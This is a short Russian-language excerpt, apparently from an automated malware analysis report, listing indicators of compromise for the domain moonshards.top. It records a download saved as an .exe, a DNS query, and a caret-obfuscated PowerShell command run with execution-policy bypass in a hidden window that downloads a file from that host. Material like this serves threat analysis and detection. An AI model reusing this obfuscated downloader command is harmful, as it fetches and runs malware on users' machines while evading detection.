Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWERshELL.exE -Ex^e^cUtiOnpOLICy ^by^pASs^ -Nopro^F^IL^e ^-W^In^DoWstYle hid^dE^N (ne^w^-O^b^j^E^ct^ sy^S^tem.Ne^t^.Web^C^lI^eN^t^)^.^D^OW^NLoa^D^FiLE(^'http://moons...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "P^oWERshELL.exE -Ex^e^cUtiOnpOLICy ^by^pASs^ -Nopro^F^IL^e ^-W^In^DoWstYle hid^dE^N (ne^w^-O^b^j^E^ct^ sy^S^tem.Ne^t^.Web^C^lI^eN^t^)^.^D^OW^NLoa^D^FiLE(^'http://moons...' (со скрытым окном)